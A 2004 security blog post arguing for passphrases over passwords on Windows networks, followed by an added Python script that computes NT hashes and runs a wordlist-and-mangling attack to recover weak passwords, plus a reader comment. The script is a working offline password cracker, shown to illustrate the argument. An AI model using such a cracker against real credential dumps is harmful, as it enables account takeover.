Why you shouldn't be using passwords of any kind on your Windows networks . . .

Posted Wednesday, July 28, 2004 3:17 PM by G Andrew Duthie

…use passphrases instead:

So this is my first ever blog entry and seeing as how I'm a senior member of the PSS Security Incident Response team, you may think I've stopped taking my medication by opening with a title like the one above!  Medication issues notwithstanding, it's true - you should NOT be using passwords of any kind.  Why?  For starters, passwords are ridiculously easy to guess or crack.  Worms like Agobot / Phatbot / Polybot / SDBot / RBot (no, I didn't write this one) all ship with dictionaries of passwords numbering in the hundreds and they can easily replicate to a system that has a password in this word list, and the miscreants are really good at keeping these wordlists up to date with passwords that they've cracked from other systems.
As an example of what I'm talking about check out Symantec's write-up of this little nasty that we encounter on my team just about every day:

http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.gaobot.ae.html

[Robert Hensing]

Read the whole thing at: http://weblogs.asp.net/robert_hensing/archive/2004/07/28/199610.aspx.
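To make the "guess or crack" point concrete, here is an added example (it is not from Robert Hensing's post or the Symantec write-up). The worm attack he describes is a wordlist attack, and it works the same way whether the worm tries the words live against an SMB logon or an attacker runs them offline against dumped NT hashes; the offline form is shown because it runs anywhere. An NT hash is MD4 over the UTF-16LE encoding of the password, so the block carries its own pure-Python MD4 (hashlib's MD4 is missing on many OpenSSL builds). The wordlist and the mangling rules are constructed for the example and are an assumption about what such lists look like; real worm lists run to hundreds of entries.

```python
"""Offline wordlist attack against Windows NT hashes (added example)."""
import struct
from typing import Iterator, Optional

MASK = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of `data` (pure Python, no hashlib dependency)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for func, ks, ss, add in rounds:
            for i in range(16):
                t = (-i) % 4  # register updated this step cycles a, d, c, b, ...
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rol((v[t] + func(p, q, r) + x[ks[i]] + add) & MASK, ss[i % 4])
        a, b, c, d = ((a + v[0]) & MASK, (b + v[1]) & MASK,
                      (c + v[2]) & MASK, (d + v[3]) & MASK)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE password, as lower-case hex."""
    return md4(password.encode("utf-16le")).hex()


# Constructed stand-in for a worm's built-in wordlist (real ones are far longer).
WORM_WORDLIST = [
    "", "admin", "administrator", "password", "pass", "root", "123456",
    "letmein", "qwerty", "secret", "server", "test", "guest", "owner",
]

# Constructed mangling rules; an assumption about how such lists get extended.
MANGLE_RULES = [
    lambda w: w,
    lambda w: w.capitalize(),
    lambda w: w + "1",
    lambda w: w.capitalize() + "1",
    lambda w: w + "123",
    lambda w: w + "!",
]


def candidates(wordlist) -> Iterator[str]:
    """Every wordlist entry under every rule, each candidate yielded once."""
    seen = set()
    for w in wordlist:
        for rule in MANGLE_RULES:
            c = rule(w)
            if c not in seen:
                seen.add(c)
                yield c


def crack_nt_hash(target_hex: str, wordlist) -> Optional[str]:
    """Return the candidate whose NT hash equals `target_hex`, or None."""
    target = target_hex.lower()
    for cand in candidates(wordlist):
        if nt_hash(cand) == target:
            return cand
    return None


if __name__ == "__main__":
    for pw in ("Password1", "admin", "correct horse battery staple"):
        h = nt_hash(pw)
        print(f"{h}  {pw!r:34} -> cracked as {crack_nt_hash(h, WORM_WORDLIST)!r}")
```

Run it and the two "passwords" fall out of the list immediately while the passphrase does not, which is the whole argument: a wordlist attack costs the attacker one hash per candidate, so the only defence on the password side is a secret that is not in any list and not a short mangling of something that is. A long multi-word passphrase gets you that; "Password1" does not.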

 


Comments

# re: Why you shouldn't be using passwords of any kind on your Windows networks . . .

Wednesday, July 28, 2004 5:07 PM by Mark Anthony

I just glanced through the article on Symantec. Says the virus copies itself as Scvhost.exe. Is it possible to check if the existing copy of svchost.exe is actually a valid and untampered one? For instance a CRC value or MD5 value that MS provides for each of the system files? Of course there is the issue of versions involved, not to mention the different OSes. Just wondering if there is something to that effect?

# Passwords, Passphrases, and validation

Tuesday, August 03, 2004 1:40 PM by TrackBack

# re:Why you shouldn't be using passwords of any kind on your Windows networks . . .

Sunday, April 10, 2005 3:56 AM by TrackBack

^_^,Pretty Good!
